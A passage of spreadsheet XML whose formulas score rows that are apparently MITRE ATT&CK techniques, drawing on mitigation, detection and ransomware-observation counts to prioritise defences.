        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.4499047619047624E-2</v>
      </c>
      <c r="AQ235" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.11499682539682542</v>
      </c>
      <c r="AR235" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.11499682539682542</v>
      </c>
      <c r="AS235" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT235" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU23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36" spans="1:47" ht="48">
      <c r="A236" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>4.0533333333333338E-2</v>
      </c>
      <c r="B236" s="25">
        <f>SUM(H236,M236,V236)*(1+SUM(AE236,AG236,AI236,AK236,AM236))</f>
        <v>0.40533333333333338</v>
      </c>
      <c r="C236" s="25" t="s">
        <v>1011</v>
      </c>
      <c r="D236" s="25" t="s">
        <v>331</v>
      </c>
      <c r="E236" s="25" t="s">
        <v>1012</v>
      </c>
      <c r="F236" s="51">
        <v>1</v>
      </c>
      <c r="G236" s="51">
        <v>1</v>
      </c>
      <c r="H236" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I236">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J236">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K236">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L236">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M236" s="25">
        <v>0</v>
      </c>
      <c r="N236" s="51">
        <v>1</v>
      </c>
      <c r="O236" s="51">
        <v>0</v>
      </c>
      <c r="P236" s="51">
        <v>0</v>
      </c>
      <c r="Q236" s="51">
        <v>0</v>
      </c>
      <c r="R236" s="52" t="s">
        <v>332</v>
      </c>
      <c r="S236" s="51">
        <v>7</v>
      </c>
      <c r="T236" s="52" t="s">
        <v>1013</v>
      </c>
      <c r="U236" s="51">
        <v>14</v>
      </c>
      <c r="V236" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.20476190476190478</v>
      </c>
      <c r="W236">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>21</v>
      </c>
      <c r="X236">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.38181818181818183</v>
      </c>
      <c r="Y236">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.38181818181818183</v>
      </c>
      <c r="Z236">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>1</v>
      </c>
      <c r="AA236">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.01</v>
      </c>
      <c r="AB236">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.01</v>
      </c>
      <c r="AC236" s="29" t="s">
        <v>1014</v>
      </c>
      <c r="AD236" s="25" t="str" cm="1">
        <f t="array" ref="AD236">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC236)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE236" s="25">
        <f>IF(AD236="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF236" s="25" t="str" cm="1">
        <f t="array" ref="AF236">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC236)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG236" s="25">
        <f>IF(AF236="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH236" s="25" t="str" cm="1">
        <f t="array" ref="AH236">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC236)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI236" s="25">
        <f>IF(AH236="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ236" s="25" t="str" cm="1">
        <f t="array" ref="AJ236">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC236)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK236" s="25">
        <f>IF(AJ236="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL236" s="25" t="str" cm="1">
        <f t="array" ref="AL236">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC236)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM236" s="25">
        <f>IF(AL236="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN236" s="60">
        <v>0</v>
      </c>
      <c r="AO236" s="51">
        <v>0</v>
      </c>
      <c r="AP236" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>4.0533333333333338E-2</v>
      </c>
      <c r="AQ236" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.13511111111111113</v>
      </c>
      <c r="AR236" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.13511111111111113</v>
      </c>
      <c r="AS236" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT236" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU23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37" spans="1:47" ht="48">
      <c r="A237" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.0000000000000006E-2</v>
      </c>
      <c r="B237" s="25">
        <f>SUM(H237,M237,V237)*(1+SUM(AE237,AG237,AI237,AK237,AM237))</f>
        <v>0.30000000000000004</v>
      </c>
      <c r="C237" s="25" t="s">
        <v>1015</v>
      </c>
      <c r="D237" s="25" t="s">
        <v>1016</v>
      </c>
      <c r="E237" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F237" s="51">
        <v>1</v>
      </c>
      <c r="G237" s="51">
        <v>1</v>
      </c>
      <c r="H237" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I237">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J237">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K237">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L237">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M237" s="25">
        <v>0</v>
      </c>
      <c r="N237" s="51">
        <v>0</v>
      </c>
      <c r="O237" s="51">
        <v>1</v>
      </c>
      <c r="P237" s="51">
        <v>1</v>
      </c>
      <c r="Q237" s="51">
        <v>0</v>
      </c>
      <c r="R237" s="52" t="s">
        <v>1017</v>
      </c>
      <c r="S237" s="51">
        <v>3</v>
      </c>
      <c r="T237" s="52" t="s">
        <v>1018</v>
      </c>
      <c r="U237" s="51">
        <v>17</v>
      </c>
      <c r="V237" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.2</v>
      </c>
      <c r="W237">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>20</v>
      </c>
      <c r="X237">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.36363636363636365</v>
      </c>
      <c r="Y237">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.36363636363636365</v>
      </c>
      <c r="Z237">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>2</v>
      </c>
      <c r="AA237">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.02</v>
      </c>
      <c r="AB237">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.02</v>
      </c>
      <c r="AC237" s="29" t="s">
        <v>141</v>
      </c>
      <c r="AD237" s="25" t="str" cm="1">
        <f t="array" ref="AD237">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC237)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE237" s="25">
        <f>IF(AD237="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF237" s="25" t="str" cm="1">
        <f t="array" ref="AF237">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC237)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG237" s="25">
        <f>IF(AF237="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH237" s="25" t="str" cm="1">
        <f t="array" ref="AH237">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC237)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI237" s="25">
        <f>IF(AH237="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ237" s="25" t="str" cm="1">
        <f t="array" ref="AJ237">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC237)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK237" s="25">
        <f>IF(AJ237="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL237" s="25" t="str" cm="1">
        <f t="array" ref="AL237">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC237)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM237" s="25">
        <f>IF(AL237="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN237" s="52">
        <v>0</v>
      </c>
      <c r="AO237" s="51">
        <v>0</v>
      </c>
      <c r="AP237" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.0000000000000006E-2</v>
      </c>
      <c r="AQ237" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.10000000000000002</v>
      </c>
      <c r="AR237" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.10000000000000002</v>
      </c>
      <c r="AS237" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT237" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU23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38" spans="1:47">
      <c r="A238" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.5940000000000007E-2</v>
      </c>
      <c r="B238" s="25">
        <f>SUM(H238,M238,V238)*(1+SUM(AE238,AG238,AI238,AK238,AM238))</f>
        <v>0.35940000000000005</v>
      </c>
      <c r="C238" s="25" t="s">
        <v>1019</v>
      </c>
      <c r="D238" s="25" t="s">
        <v>114</v>
      </c>
      <c r="E238" s="25" t="s">
        <v>1020</v>
      </c>
      <c r="F238" s="51">
        <v>1</v>
      </c>
      <c r="G238" s="51">
        <v>1</v>
      </c>
      <c r="H238" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I238">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J238">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K238">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L238">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M238" s="25">
        <v>0</v>
      </c>
      <c r="N238" s="51">
        <v>0</v>
      </c>
      <c r="O238" s="51">
        <v>0</v>
      </c>
      <c r="P238" s="51">
        <v>0</v>
      </c>
      <c r="Q238" s="51">
        <v>0</v>
      </c>
      <c r="R238" s="52" t="s">
        <v>115</v>
      </c>
      <c r="S238" s="51">
        <v>9</v>
      </c>
      <c r="T238" s="51" t="s">
        <v>116</v>
      </c>
      <c r="U238" s="51">
        <v>12</v>
      </c>
      <c r="V238" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.2</v>
      </c>
      <c r="W238">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>21</v>
      </c>
      <c r="X238">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.38181818181818183</v>
      </c>
      <c r="Y238">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.38181818181818183</v>
      </c>
      <c r="Z238">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA238">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB238">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC238" s="29" t="s">
        <v>1021</v>
      </c>
      <c r="AD238" s="25" t="str" cm="1">
        <f t="array" ref="AD238">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC238)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE238" s="25">
        <f>IF(AD238="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF238" s="25" t="str" cm="1">
        <f t="array" ref="AF238">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC238)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG238" s="25">
        <f>IF(AF238="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH238" s="25" t="str" cm="1">
        <f t="array" ref="AH238">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC238)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI238" s="25">
        <f>IF(AH238="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ238" s="25" t="str" cm="1">
        <f t="array" ref="AJ238">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC238)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK238" s="25">
        <f>IF(AJ238="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL238" s="25" t="str" cm="1">
        <f t="array" ref="AL238">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC238)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM238" s="25">
        <f>IF(AL238="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN238" s="59">
        <v>0</v>
      </c>
      <c r="AO238" s="51">
        <v>0</v>
      </c>
      <c r="AP238" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.5940000000000007E-2</v>
      </c>
      <c r="AQ238" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.11980000000000002</v>
      </c>
      <c r="AR238" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.11980000000000002</v>
      </c>
      <c r="AS238" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT238" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU23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39" spans="1:47" ht="32.1">
      <c r="A239" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.5940000000000007E-2</v>
      </c>
      <c r="B239" s="25">
        <f>SUM(H239,M239,V239)*(1+SUM(AE239,AG239,AI239,AK239,AM239))</f>
        <v>0.35940000000000005</v>
      </c>
      <c r="C239" s="25" t="s">
        <v>1022</v>
      </c>
      <c r="D239" s="25" t="s">
        <v>690</v>
      </c>
      <c r="E239" s="25" t="s">
        <v>1023</v>
      </c>
      <c r="F239" s="51">
        <v>1</v>
      </c>
      <c r="G239" s="51">
        <v>1</v>
      </c>
      <c r="H239" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I239">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J239">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K239">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L239">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M239" s="25">
        <v>0</v>
      </c>
      <c r="N239" s="51">
        <v>0</v>
      </c>
      <c r="O239" s="51">
        <v>0</v>
      </c>
      <c r="P239" s="51">
        <v>0</v>
      </c>
      <c r="Q239" s="51">
        <v>0</v>
      </c>
      <c r="R239" s="52" t="s">
        <v>1024</v>
      </c>
      <c r="S239" s="51">
        <v>9</v>
      </c>
      <c r="T239" s="52" t="s">
        <v>1025</v>
      </c>
      <c r="U239" s="51">
        <v>12</v>
      </c>
      <c r="V239" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.2</v>
      </c>
      <c r="W239">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>21</v>
      </c>
      <c r="X239">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.38181818181818183</v>
      </c>
      <c r="Y239">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.38181818181818183</v>
      </c>
      <c r="Z239">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA239">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB239">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC239" s="29" t="s">
        <v>856</v>
      </c>
      <c r="AD239" s="25" t="str" cm="1">
        <f t="array" ref="AD239">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC239)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE239" s="25">
        <f>IF(AD239="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF239" s="25" t="str" cm="1">
        <f t="array" ref="AF239">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC239)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG239" s="25">
        <f>IF(AF239="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH239" s="25" t="str" cm="1">
        <f t="array" ref="AH239">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC239)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI239" s="25">
        <f>IF(AH239="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ239" s="25" t="str" cm="1">
        <f t="array" ref="AJ239">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC239)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK239" s="25">
        <f>IF(AJ239="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL239" s="25" t="str" cm="1">
        <f t="array" ref="AL239">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC239)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM239" s="25">
        <f>IF(AL239="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN239" s="60">
        <v>0</v>
      </c>
      <c r="AO239" s="51">
        <v>0</v>
      </c>
      <c r="AP239" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.5940000000000007E-2</v>
      </c>
      <c r="AQ239" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.11980000000000002</v>
      </c>
      <c r="AR239" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.11980000000000002</v>
      </c>
      <c r="AS239" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT239" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU23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40" spans="1:47" ht="48">
      <c r="A240" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.3420952380952385E-2</v>
      </c>
      <c r="B240" s="25">
        <f>SUM(H240,M240,V240)*(1+SUM(AE240,AG240,AI240,AK240,AM240))</f>
        <v>0.3342095238095239</v>
      </c>
      <c r="C240" s="25" t="s">
        <v>1026</v>
      </c>
      <c r="D240" s="25" t="s">
        <v>447</v>
      </c>
      <c r="E240" s="25" t="s">
        <v>1027</v>
      </c>
      <c r="F240" s="51">
        <v>1</v>
      </c>
      <c r="G240" s="51">
        <v>1</v>
      </c>
      <c r="H240" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I240">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J240">
